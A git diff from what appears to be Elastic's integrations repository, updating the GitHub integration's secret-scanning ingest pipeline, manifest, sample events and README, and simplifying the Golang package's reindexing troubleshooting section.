1.0\",\"due_on\":\"2012-10-09T23:39:01Z\",\"html_url\":\"https://github.com/octocat/Hello-World/milestones/v1.0\",\"id\":1002604,\"labels_url\":\"https://api.github.com/repos/octocat/Hello-World/milestones/1/labels\",\"node_id\":\"MDk6TWlsZXN0b25lMTAwMjYwNA==\",\"number\":1,\"open_issues\":4,\"state\":\"open\",\"title\":\"v1.0\",\"updated_at\":\"2014-03-03T18:58:10Z\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/milestones/1\"},\"node_id\":\"MDU6SXNzdWUx\",\"number\":1347,\"pull_request\":{\"diff_url\":\"https://github.com/octocat/Hello-World/pull/1347.diff\",\"html_url\":\"https://github.com/octocat/Hello-World/pull/1347\",\"patch_url\":\"https://github.com/octocat/Hello-World/pull/1347.patch\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/pulls/1347\"},\"repository_url\":\"https://api.github.com/repos/octocat/Hello-World\",\"state\":\"open\",\"state_reason\":\"completed\",\"title\":\"Found a bug\",\"updated_at\":\"2011-04-22T13:33:48Z\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347\",\"user\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"}}" }, @@ -124,4 +124,4 @@ "id": "1", "name": "octocat" } -} +} \ No newline at end of file diff --git a/packages/github/data_stream/secret_scanning/elasticsearch/ingest_pipeline/default.yml b/packages/github/data_stream/secret_scanning/elasticsearch/ingest_pipeline/default.yml index 6a3e634ccb2..43f7b832649 100644 --- a/packages/github/data_stream/secret_scanning/elasticsearch/ingest_pipeline/default.yml +++ b/packages/github/data_stream/secret_scanning/elasticsearch/ingest_pipeline/default.yml @@ -15,6 +15,9 @@ processors: - json: field: event.original target_field: github.secret_scanning + - fail: + if: "!(ctx.github.secret_scanning instanceof Map)" + message: Missing JSON object - fingerprint: fields: - github.secret_scanning.number @@ -25,28 +28,28 @@ processors: - set: copy_from: github.secret_scanning.created_at field: event.created - if: ctx.github.secret_scanning?.created_at != null + if: ctx.github.secret_scanning.created_at != null - date: field: github.secret_scanning.created_at formats: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.secret_scanning?.created_at != null && ctx.github.secret_scanning?.updated_at == null && ctx.github.secret_scanning?.resolved_at == null + if: ctx.github.secret_scanning.created_at != null && ctx.github.secret_scanning.updated_at == null && ctx.github.secret_scanning.resolved_at == null - date: field: github.secret_scanning.updated_at formats: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.secret_scanning?.updated_at != null && ctx.github.secret_scanning?.resolved_at == null + if: ctx.github.secret_scanning.updated_at != null && ctx.github.secret_scanning.resolved_at == null - date: field: github.secret_scanning.resolved_at formats: - ISO8601 timezone: UTC target_field: "@timestamp" - if: ctx.github.secret_scanning?.resolved_at != null + if: ctx.github.secret_scanning.resolved_at != null - rename: target_field: _temp.repository field: github.secret_scanning.repository @@ -172,7 +175,7 @@ processors: - rename: field: _temp.number target_field: github.secret_scanning.number - if: ctx.github.secret_scanning?.number == null + if: ctx.github.secret_scanning.number == null ignore_missing: true - lowercase: field: github.secret_scanning.state @@ -180,7 +183,7 @@ processors: - set: field: github.state value: "{{github.secret_scanning.state}}" - if: ctx.github.secret_scanning?.state != null + if: ctx.github.secret_scanning.state != null - set: field: github.severity value: "undefined" @@ -228,7 +231,7 @@ processors: - script: lang: painless description: Mask the secret if hide_secret is true - if: ctx.tags != null && ctx.tags.contains('hide_secret') && ctx.github?.secret_scanning?.secret != null + if: ctx.tags != null && ctx.tags.contains('hide_secret') && ctx.github.secret_scanning.secret != null source: | def secret = ctx.github.secret_scanning.secret.toString(); def masked_secret = secret; @@ -240,7 +243,7 @@ processors: - script: lang: painless description: Calculate time taken to resolve the secrets - if: ctx.github.secret_scanning?.resolved_at != null + if: ctx.github.secret_scanning.resolved_at != null source: | def time_to_resolution = new HashMap(); def resolvedAtDt = ctx.github.secret_scanning.resolved_at; @@ -260,7 +263,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - script: diff --git a/packages/github/data_stream/secret_scanning/manifest.yml b/packages/github/data_stream/secret_scanning/manifest.yml index a74acf45cf3..6ad4da6d26f 100644 --- a/packages/github/data_stream/secret_scanning/manifest.yml +++ b/packages/github/data_stream/secret_scanning/manifest.yml @@ -4,12 +4,13 @@ streams: - input: httpjson vars: - name: access_token - type: text + type: password title: Personal Access Token description: the GitHub Personal Access Token. Requires `admin` access to the repository or organization owning the repository along with a personal access token with 'public_repo' scope for public repositories and `repo` or `security_events` scope for private repositories. \nSee [List secret scanning alerts for a repository](https://docs.github.com/en/enterprise-cloud@latest/rest/secret-scanning#list-secret-scanning-alerts-for-a-repository) multi: false required: true show_user: true + secret: true - name: owner type: text title: Repository owner @@ -48,6 +49,7 @@ streams: type: bool multi: false default: true + secret: false - name: api_url type: text title: API URL. diff --git a/packages/github/data_stream/secret_scanning/sample_event.json b/packages/github/data_stream/secret_scanning/sample_event.json index 0a0e0407946..3c3bd9328ae 100644 --- a/packages/github/data_stream/secret_scanning/sample_event.json +++ b/packages/github/data_stream/secret_scanning/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2022-06-30T18:07:27.000Z", "agent": { - "ephemeral_id": "055b4216-543e-43cb-966b-f9f71d8b6144", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "85b829d8-54c4-4280-960b-6ca42b7c1772", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.secret_scanning", @@ -16,16 +16,16 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "secret_scanning", "agent_id_status": "verified", "created": "2022-06-30T18:07:27Z", "dataset": "github.secret_scanning", - "ingested": "2023-09-28T21:03:11Z", + "ingested": "2024-01-18T16:01:42Z", "original": "{\"created_at\":\"2022-06-30T18:07:27Z\",\"html_url\":\"https://github.com/sample_owner/sample_repo/security/secret-scanning/3\",\"number\":3,\"push_protection_bypassed\":true,\"push_protection_bypassed_by\":{\"html_url\":\"https://github.com/sample_owner\",\"login\":\"sample_owner\",\"type\":\"User\",\"url\":\"https://api.github.com/users/sample_owner\"},\"resolution\":\"revoked\",\"resolved_by\":{\"login\":\"sample_owner\",\"type\":\"User\",\"url\":\"https://api.github.com/users/sample_owner\"},\"secret\":\"npm_2vYJ3QzGXoGbEgMYduYS1k2M4D0wDu2opJbl\",\"secret_type\":\"npm_access_token\",\"secret_type_display_name\":\"npm Access Token\",\"state\":\"open\",\"url\":\"https://api.github.com/repos/sample_owner/sample_repo/secret-scanning/alerts/3\"}" }, "github": { @@ -72,4 +72,4 @@ "preserve_original_event", "hide_secret" ] -} +} \ No newline at end of file diff --git a/packages/github/docs/README.md b/packages/github/docs/README.md index 917ddb4595e..0ca08ce09bb 100644 --- a/packages/github/docs/README.md +++ b/packages/github/docs/README.md @@ -97,11 +97,11 @@ An example event for `audit` looks as following: { "@timestamp": "2020-11-18T17:05:48.837Z", "agent": { - "ephemeral_id": "fbdd879c-8de1-464b-a6a2-dbd9847eff73", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "9246e7d9-fcc1-46ab-b3fd-2d0888f2a94d", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.audit", @@ -112,9 +112,9 @@ An example event for `audit` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "repo.destroy", @@ -123,10 +123,10 @@ An example event for `audit` looks as following: "configuration", "web" ], - "created": "2023-09-28T20:59:05.392Z", + "created": "2024-01-18T15:58:09.826Z", "dataset": "github.audit", "id": "LwW2vpJZCDS-WUmo9Z-ifw", - "ingested": "2023-09-28T20:59:06Z", + "ingested": "2024-01-18T15:58:19Z", "kind": "event", "original": "{\"@timestamp\":1605719148837,\"_document_id\":\"LwW2vpJZCDS-WUmo9Z-ifw\",\"action\":\"repo.destroy\",\"actor\":\"monalisa\",\"created_at\":1605719148837,\"org\":\"mona-org\",\"repo\":\"mona-org/mona-test-repo\",\"visibility\":\"private\"}", "type": [ @@ -155,7 +155,6 @@ An example event for `audit` looks as following: "name": "monalisa" } } - ``` @@ -268,11 +267,11 @@ An example event for `code_scanning` looks as following: { "@timestamp": "2022-06-29T18:03:27.000Z", "agent": { - "ephemeral_id": "1a42d4f4-d9bb-4b37-ad28-0da74f732b5b", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "b359acfc-81ff-4631-8a85-05f9627d12e4", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.code_scanning", @@ -283,16 +282,16 @@ An example event for `code_scanning` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "code_scanning", "agent_id_status": "verified", "created": "2022-06-29T18:03:27.000Z", "dataset": "github.code_scanning", - "ingested": "2023-09-28T21:00:06Z", + "ingested": "2024-01-18T15:59:07Z", "kind": "alert", "original": "{\"created_at\":\"2022-06-29T18:03:27Z\",\"html_url\":\"https://github.com/sample_owner/sample_repo/security/code-scanning/91\",\"most_recent_instance\":{\"analysis_key\":\".github/workflows/codeql-analysis.yml:analyze\",\"category\":\".github/workflows/codeql-analysis.yml:analyze/language:javascript\",\"classifications\":[],\"commit_sha\":\"3244e8b15cc1b8f2732eecd69fc1890b737f0dda\",\"location\":{\"end_column\":50,\"end_line\":67,\"path\":\"routes/chatbot.ts\",\"start_column\":23,\"start_line\":67},\"message\":{\"text\":\"(Experimental) This may be a database query that depends on a user-provided value. Identified using machine learning.(Experimental) This may be a database query that depends on a user-provided value. Identified using machine learning.\"},\"ref\":\"refs/heads/master\",\"state\":\"open\"},\"number\":90,\"rule\":{\"description\":\"SQL database query built from user-controlled sources (experimental)\",\"id\":\"js/ml-powered/sql-injection\",\"security_severity_level\":\"high\",\"severity\":\"error\",\"tags\":[\"experimental\",\"external/cwe/cwe-089\",\"security\"]},\"state\":\"open\",\"tool\":{\"name\":\"CodeQL\",\"version\":\"2.9.4\"},\"updated_at\":\"2022-06-29T18:03:27Z\",\"url\":\"https://api.github.com/repos/sample_owner/sample_repo/code-scanning/alerts/91\"}" }, @@ -355,7 +354,6 @@ An example event for `code_scanning` looks as following: "security" ] } - ``` @@ -446,11 +444,11 @@ An example event for `secret_scanning` looks as following: { "@timestamp": "2022-06-30T18:07:27.000Z", "agent": { - "ephemeral_id": "055b4216-543e-43cb-966b-f9f71d8b6144", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "85b829d8-54c4-4280-960b-6ca42b7c1772", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.secret_scanning", @@ -461,16 +459,16 @@ An example event for `secret_scanning` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "secret_scanning", "agent_id_status": "verified", "created": "2022-06-30T18:07:27Z", "dataset": "github.secret_scanning", - "ingested": "2023-09-28T21:03:11Z", + "ingested": "2024-01-18T16:01:42Z", "original": "{\"created_at\":\"2022-06-30T18:07:27Z\",\"html_url\":\"https://github.com/sample_owner/sample_repo/security/secret-scanning/3\",\"number\":3,\"push_protection_bypassed\":true,\"push_protection_bypassed_by\":{\"html_url\":\"https://github.com/sample_owner\",\"login\":\"sample_owner\",\"type\":\"User\",\"url\":\"https://api.github.com/users/sample_owner\"},\"resolution\":\"revoked\",\"resolved_by\":{\"login\":\"sample_owner\",\"type\":\"User\",\"url\":\"https://api.github.com/users/sample_owner\"},\"secret\":\"npm_2vYJ3QzGXoGbEgMYduYS1k2M4D0wDu2opJbl\",\"secret_type\":\"npm_access_token\",\"secret_type_display_name\":\"npm Access Token\",\"state\":\"open\",\"url\":\"https://api.github.com/repos/sample_owner/sample_repo/secret-scanning/alerts/3\"}" }, "github": { @@ -518,7 +516,6 @@ An example event for `secret_scanning` looks as following: "hide_secret" ] } - ``` ### Dependabot @@ -634,11 +631,11 @@ An example event for `dependabot` looks as following: { "@timestamp": "2022-07-11T11:39:07.000Z", "agent": { - "ephemeral_id": "d5a942e6-27ef-4ef0-b922-fbc0084f6e1c", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "786d0d42-a64a-43ae-846d-03d72b473384", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.dependabot", @@ -649,16 +646,16 @@ An example event for `dependabot` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "dependabot", "agent_id_status": "verified", "created": "2022-07-11T11:39:07.000Z", "dataset": "github.dependabot", - "ingested": "2023-09-28T21:01:11Z", + "ingested": "2024-01-18T15:59:57Z", "kind": "alert", "original": "{\"createdAt\":\"2022-07-11T11:39:07Z\",\"dependabotUpdate\":{\"error\":{\"body\":\"The currently installed version can't be determined.\\n\\nTo resolve the issue add a supported lockfile (package-lock.json or yarn.lock).\",\"errorType\":\"dependency_file_not_supported\",\"title\":\"Dependabot can't update vulnerable dependencies without a lockfile\"},\"pullRequest\":null},\"dependencyScope\":\"RUNTIME\",\"dismissReason\":null,\"dismissedAt\":null,\"dismisser\":null,\"fixedAt\":null,\"number\":1,\"repository\":{\"description\":\"OWASP Juice Shop: Probably the most modern and sophisticated insecure web application\",\"isInOrganization\":false,\"isPrivate\":false,\"name\":\"sample_repo\",\"owner\":{\"login\":\"sample_owner\",\"url\":\"https://github.com/sample_owner\"},\"url\":\"https://github.com/sample_owner/sample_repo\"},\"securityAdvisory\":{\"classification\":\"GENERAL\",\"cvss\":{\"score\":0,\"vectorString\":null},\"cwes\":{\"nodes\":[{\"cweId\":\"CWE-20\",\"description\":\"The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.\",\"name\":\"Improper Input Validation\"}]},\"description\":\"Versions 4.2.1 and earlier of `jsonwebtoken` are affected by a verification bypass vulnerability. This is a result of weak validation of the JWT algorithm type, occuring when an attacker is allowed to arbitrarily specify the JWT algorithm.\\n\\n\\n\\n\\n## Recommendation\\n\\nUpdate to version 4.2.2 or later.\",\"ghsaId\":\"GHSA-c7hr-j4mj-j2w6\",\"identifiers\":[{\"type\":\"GHSA\",\"value\":\"GHSA-c7hr-j4mj-j2w6\"},{\"type\":\"CVE\",\"value\":\"CVE-2015-9235\"}],\"origin\":\"UNSPECIFIED\",\"permalink\":\"https://github.com/advisories/GHSA-c7hr-j4mj-j2w6\",\"publishedAt\":\"2018-10-09T00:38:30Z\",\"references\":[{\"url\":\"https://nvd.nist.gov/vuln/detail/CVE-2015-9235\"},{\"url\":\"https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687\"},{\"url\":\"https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/\"},{\"url\":\"https://github.com/advisories/GHSA-c7hr-j4mj-j2w6\"},{\"url\":\"https://www.npmjs.com/advisories/17\"},{\"url\":\"https://www.timmclean.net/2015/02/25/jwt-alg-none.html\"},{\"url\":\"https://nodesecurity.io/advisories/17\"}],\"severity\":\"CRITICAL\",\"summary\":\"Verification Bypass in jsonwebtoken\",\"updatedAt\":\"2021-01-08T19:00:39Z\",\"withdrawnAt\":null},\"securityVulnerability\":{\"firstPatchedVersion\":{\"identifier\":\"4.2.2\"},\"package\":{\"ecosystem\":\"NPM\",\"name\":\"jsonwebtoken\"},\"severity\":\"CRITICAL\",\"updatedAt\":\"2018-11-30T19:54:28Z\",\"vulnerableVersionRange\":\"\\u003c 4.2.2\"},\"state\":\"OPEN\",\"vulnerableManifestFilename\":\"package.json\",\"vulnerableManifestPath\":\"package.json\",\"vulnerableRequirements\":\"= 0.4.0\"}", "start": "2022-07-11T11:39:07Z" @@ -679,7 +676,7 @@ An example event for `dependabot` looks as following: "classification": "GENERAL", "cwes": [ { - "cweId": "CWE-20", + "cwe_id": "CWE-20", "description": "The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.", "name": "Improper Input Validation" } @@ -763,7 +760,6 @@ An example event for `dependabot` looks as following: "severity": "critical" } } - ``` ### Issues @@ -885,11 +881,11 @@ An example event for `issues` looks as following: { "@timestamp": "2011-04-22T13:33:48.000Z", "agent": { - "ephemeral_id": "f9522412-8a4b-49a9-9c7c-0f5e5925ca64", - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "ephemeral_id": "584c482b-3ffa-4d41-8926-c8194940a361", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.12.0" }, "data_stream": { "dataset": "github.issues", @@ -900,16 +896,16 @@ An example event for `issues` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f86f831a-cae2-454f-a985-4f579b0ee515", + "id": "ad5c3ec8-3015-4cd2-a269-a2f3df062a2c", "snapshot": false, - "version": "8.7.1" + "version": "8.12.0" }, "event": { "action": "event", "agent_id_status": "verified", "created": "2011-04-22T13:33:48.000Z", "dataset": "github.issues", - "ingested": "2023-09-28T21:02:11Z", + "ingested": "2024-01-18T16:00:55Z", "kind": "event", "original": "{\"active_lock_reason\":\"too heated\",\"assignee\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"},\"assignees\":[{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"}],\"author_association\":\"COLLABORATOR\",\"body\":\"I'm having a problem with this.\",\"closed_at\":null,\"closed_by\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"},\"comments\":0,\"comments_url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347/comments\",\"created_at\":\"2011-04-22T13:33:48Z\",\"events_url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347/events\",\"html_url\":\"https://github.com/octocat/Hello-World/issues/1347\",\"id\":1,\"labels\":[{\"color\":\"f29513\",\"default\":true,\"description\":\"Something isn't working\",\"id\":208045946,\"name\":\"bug\",\"node_id\":\"MDU6TGFiZWwyMDgwNDU5NDY=\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/labels/bug\"}],\"labels_url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347/labels{/name}\",\"locked\":true,\"milestone\":{\"closed_at\":\"2013-02-12T13:22:01Z\",\"closed_issues\":8,\"created_at\":\"2011-04-10T20:09:31Z\",\"creator\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"},\"description\":\"Tracking milestone for version 1.0\",\"due_on\":\"2012-10-09T23:39:01Z\",\"html_url\":\"https://github.com/octocat/Hello-World/milestones/v1.0\",\"id\":1002604,\"labels_url\":\"https://api.github.com/repos/octocat/Hello-World/milestones/1/labels\",\"node_id\":\"MDk6TWlsZXN0b25lMTAwMjYwNA==\",\"number\":1,\"open_issues\":4,\"state\":\"open\",\"title\":\"v1.0\",\"updated_at\":\"2014-03-03T18:58:10Z\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/milestones/1\"},\"node_id\":\"MDU6SXNzdWUx\",\"number\":1347,\"pull_request\":{\"diff_url\":\"https://github.com/octocat/Hello-World/pull/1347.diff\",\"html_url\":\"https://github.com/octocat/Hello-World/pull/1347\",\"patch_url\":\"https://github.com/octocat/Hello-World/pull/1347.patch\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/pulls/1347\"},\"repository_url\":\"https://api.github.com/repos/octocat/Hello-World\",\"state\":\"open\",\"state_reason\":\"completed\",\"title\":\"Found a bug\",\"updated_at\":\"2011-04-22T13:33:48Z\",\"url\":\"https://api.github.com/repos/octocat/Hello-World/issues/1347\",\"user\":{\"avatar_url\":\"https://github.com/images/error/octocat_happy.gif\",\"events_url\":\"https://api.github.com/users/octocat/events{/privacy}\",\"followers_url\":\"https://api.github.com/users/octocat/followers\",\"following_url\":\"https://api.github.com/users/octocat/following{/other_user}\",\"gists_url\":\"https://api.github.com/users/octocat/gists{/gist_id}\",\"gravatar_id\":\"\",\"html_url\":\"https://github.com/octocat\",\"id\":1,\"login\":\"octocat\",\"node_id\":\"MDQ6VXNlcjE=\",\"organizations_url\":\"https://api.github.com/users/octocat/orgs\",\"received_events_url\":\"https://api.github.com/users/octocat/received_events\",\"repos_url\":\"https://api.github.com/users/octocat/repos\",\"site_admin\":false,\"starred_url\":\"https://api.github.com/users/octocat/starred{/owner}{/repo}\",\"subscriptions_url\":\"https://api.github.com/users/octocat/subscriptions\",\"type\":\"User\",\"url\":\"https://api.github.com/users/octocat\"}}" }, @@ -1009,5 +1005,4 @@ An example event for `issues` looks as following: "name": "octocat" } } - ``` \ No newline at end of file diff --git a/packages/github/manifest.yml b/packages/github/manifest.yml index 11b5e96f96b..e3b8ab54974 100644 --- a/packages/github/manifest.yml +++ b/packages/github/manifest.yml @@ -1,13 +1,13 @@ name: github title: GitHub -version: "1.27.2" +version: "1.28.0" description: Collect logs from GitHub with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: [security, "productivity_security"] conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/github.svg title: GitHub diff --git a/packages/golang/_dev/build/docs/README.md b/packages/golang/_dev/build/docs/README.md index e8dc18f8099..856500d2c7f 100644 --- a/packages/golang/_dev/build/docs/README.md +++ b/packages/golang/_dev/build/docs/README.md @@ -37,97 +37,7 @@ For step-by-step instructions on how to set up an integration, see the [Getting ### Troubleshooting -If host.ip is shown conflicted under ``logs-*`` data view, then this issue can be solved by reindexing the ``Heap`` and ``Expvar`` data stream's indices. -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Golang -> Integration policies` open the configuration of Golang and disable the `Collect Golang metrics` toggle to reindex metrics data stream and save the integration. - -2. Copy data into the temporary index and delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-golang.heap-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -``` -DELETE /_data_stream/ -``` -Example: -``` -DELETE /_data_stream/logs-golang.heap-default -``` - -``` -DELETE _index_template/ -``` -Example: -``` -DELETE _index_template/logs-golang.heap -``` -3. Go to `Integrations -> Golang -> Settings` and click on `Reinstall Golang`. - -4. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - - } -} -``` -Example: -``` -POST _reindex -{ - "conflicts": "proceed", - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-golang.heap-default", - "op_type": "create" - - } -} -``` - -5. Verify data is reindexed completely. - -6. Start the data stream by going to the `Integrations -> Golang -> Integration policies` and open configuration of integration and enable the `Collect Golang metrics` toggle and save the integration. - -7. Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +- If `host.ip` appears conflicted under the ``logs-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Heap`` and ``Expvar`` data streams. ## Metrics reference diff --git a/packages/golang/changelog.yml b/packages/golang/changelog.yml index ee90617a5a4..d5992cde7e8 100644 --- a/packages/golang/changelog.yml +++ b/packages/golang/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.4.1" + changes: + - description: Update README with reindexing steps. + type: enhancement + link: https://github.com/elastic/integrations/pull/9529 +- version: "1.4.0" + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + 